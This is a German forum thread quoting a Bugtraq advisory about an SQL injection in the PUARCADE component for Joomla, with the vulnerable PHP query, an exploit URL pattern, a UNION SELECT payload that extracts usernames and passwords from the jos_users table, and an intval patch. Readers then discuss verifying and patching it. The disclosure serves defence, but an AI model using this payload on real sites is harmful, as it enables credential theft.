Thema: Pu Arcade component for Joomla - SQL injection

Auf Bugtraq fand ich folgenden Eintrag (erstellt: 09.04.2008 11:20 Uhr von netmantis.com@gmail.com):


###Beginn###
I discovered a vulnerability in Component PUARCADE for joomla (the last version is vulnerable) .

SQL Injection vulnerability in puarcade.class.php <= V. 2.2 , component for JOOMLA .
--------------------------------------------------------------------------------------------------------------------------

Author : MantiS
---------

Vulnerable code :
------------------------
function warningByGame($gid) {
global $database;

$query = "SELECT c.id, c.name, c.description, c.warningrequired, c.imagename FROM
#__puarcade_games as g, #__puarcade_contentrating as c"
. " WHERE g.contentratingid = c.id"
. " AND g.id = $gid";
$database->setQuery($query);
$cont = $database->loadObjectList();
--------------------------

Exploit : http://website.com/joomla_path/index...&Itemid=1&gid=[SQL
INJECTION]
---------
Can be exploited with a "0 UNION SELECT password,username,0,0,0 from jos_users--" (5 columns) .

Patch :
--------
Place before "$query = "SELECT c.id......... " :
$gid = intval($_GET['gid']);
To force $gid variable conversion at an integer .
###Ende###

Kann das jemand verifizieren?

Zitat von keraM

Kann das jemand verifizieren?

Installiers und teste . Ich hab das Ding noch nicht verbaut, und ich denke, die wenigsten können etwas mit dem Exploit anfangen. Auf Milw0rm fliegt sowas auch ständig herum, und es gibt sicher noch ein paar Dutzend, die nirgendwo publiziert sind.

Zitat von keraM

Kann das jemand verifizieren?

die sql anweisung so wie sie da steht stimmt und wenn die nicht vorher irgendwo gesichert wird (hab ich noch nicht nachgeschaut) existiert die lücke auch. also besser absichern als nachher gehackt werden. danke für den hinweis